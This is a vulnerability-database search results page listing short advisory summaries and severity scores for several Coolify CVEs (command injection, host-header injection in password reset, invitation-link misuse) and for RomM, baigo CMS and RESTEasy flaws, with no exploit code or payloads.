Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

8 matches found

NVD
NVDadded 2026/01/05 9:16 p.m.2 views

CVE-2025-64423

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, a low privileged user member can see and use invitation links sent to an administrator. When they use the link before the legitimate recipie...

8.8CVSS0.00061EPSS
Exploits1References1
OSV
OSVadded 2026/01/05 8:49 p.m.1 views

CVE-2025-64425 Coolify has host header injection in forgot password

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions up to and including v4.0.0-beta.434, an attacker can initiate a password reset for a victim, and modify the host header of the request to a malicious value. The victim will...

8.5CVSS6.8AI score0.00039EPSS
Exploits1References4
CVE
CVEadded 2026/01/05 8:49 p.m.9 views

CVE-2025-64425

CVE-2025-64425 affects Coolify up to v4.0.0-beta.434. The vulnerability arises in the password reset flow where an attacker can modify the host header of the request. The victim receives a reset email containing a link to the attacker’s host; when the user clicks it, the reset token is sent to th...

8.5CVSS6.6AI score0.00039EPSS
Exploits1References2Affected Software1
CNNVD
CNNVDadded 2026/01/05 12:0 a.m.2 views

Coolify 安全漏洞

Coolify is an open source and self-hosted Heroku/Netlify/Vercel replacement from coolLabs Open Source. A security vulnerability exists in Coolify v4.0.0-beta.434 and earlier versions, which stems from a low-privileged user being able to invite a high-privileged user, potentially resulting in...

8.7CVSS6.5AI score0.00037EPSS
Exploits1References2
OSV
OSVadded 2025/12/23 10:6 p.m.2 views

CVE-2025-66213 Coolify Vulnerable to Authenticated Remote Code Execution via Command Injection in File Storage Directory Mount Path

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the File Storage Directory Mount Path functionality allows users with application/service management permissions...

9.4CVSS9.1AI score0.0025EPSS
Exploits2References6
CNNVD
CNNVDadded 2025/07/21 12:0 a.m.2 views

Romm 代码问题漏洞

Romm is an open source manager for read-only memory from The RomM Project. A code issue vulnerability exists in Romm 4.0.0-beta.3 and prior versions that stems from improper access control of the /api/saves endpoint, which could lead to arbitrary file writes and remote code execution...

9.4CVSS7.9AI score0.03071EPSS
Exploits0References2
Positive Technologies
Positive Technologiesadded 2021/07/08 12:0 a.m.3 views

PT-2021-10508 · Baigo Cms · Baigo Cms

Name of the Vulnerable Software and Affected Versions: baigo CMS version 4.0-beta-1 Description: A cross-site scripting issue allows attackers to execute arbitrary web scripts or HTML via the post parameter to the "/public/console/profile/info-submit/" API endpoint. Recommendations: For baigo CMS...

6.1CVSS6.1AI score0.00493EPSS
Exploits1References5
Snyk
Snykadded 2021/05/28 12:51 p.m.3 views

Cross-site Scripting (XSS)

Overview org.jboss.resteasy:resteasy-jaxrs is a JCP specification that provides a Java API for RESTful Web Services over the HTTP protocol. Affected versions of this package are vulnerable to Cross-site Scripting XSS. It did not properly handle URL encoding when the RESTEASY003870 exception occur...

7.1CVSS5.4AI score0.00344EPSS
Exploits1References2
Rows per page
Query Builder